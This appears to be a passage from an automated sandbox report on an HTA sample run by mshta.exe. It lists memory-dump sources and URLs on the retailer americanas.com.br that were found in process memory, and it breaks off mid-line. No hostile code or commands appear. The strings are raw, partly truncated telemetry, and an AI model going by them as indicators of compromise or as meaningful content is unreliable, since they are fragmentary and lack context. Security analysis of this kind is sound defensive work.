Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=dk_hm_at_suplemento
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=dk_hm_at_suplementometa.largem
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=pfm_home_suplementos_menu
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/suplementosV
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/telefonia-fixa?chave=pfm_home_telefonia_menu
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D01000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/acessorios-para-tv-e-video?chave=pfm_hm_tt
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/home-theater?chave=pfm_hm_tt_1_0_home-thea
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541371134.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536957836.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535821688.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/tv/g/marca-LG/marca-Lg/marca-lg?viewMode=l
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/tv?chave=pfm_hm_tt_1_0_tv
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=dk_hm_at_tvs
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=dk_hm_at_tvsmeta.largemeta.large.hei
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_hm_tt_1_0_tv-e-home-theater
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_home_tv_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/utilidades-domesticas?chave=dk_hm_at_ud
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/utilidades-domesticas?chave=dk_hm_at_udmeta.largemeta.large.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535630387.0000000005308000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/utilidades-domesticas?chave=pfm_home_ud_menu
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/utilidadesE)
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/vale-presente?chave=pfm_home_valepresentes_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/vestuario-esportivo?chave=pfm_home_vestuarioesportivo_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/afiliados?chave=dk_hm_ft_00_02_afiliados
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/black-friday?chave=dk_hm_ft_00_09_blackfriday
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/black-friday?chave=dk_hm_ft_00_09_blackfridaye
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/celular-5g?chave=pfm_hm_tt_1_0_tecnologia5g
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/lojas-oficiais?chave=dk_hm_branding_lojasoficiais
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/lojas-oficiais?chave=prf_hs_0_dt_1_00_lojasoficiais
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536529821.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/natal
Source: mshta.exe, 00000000.00000003.548553793.00000000079C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540451503.00000000079C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal13
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540451503.00000000079C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 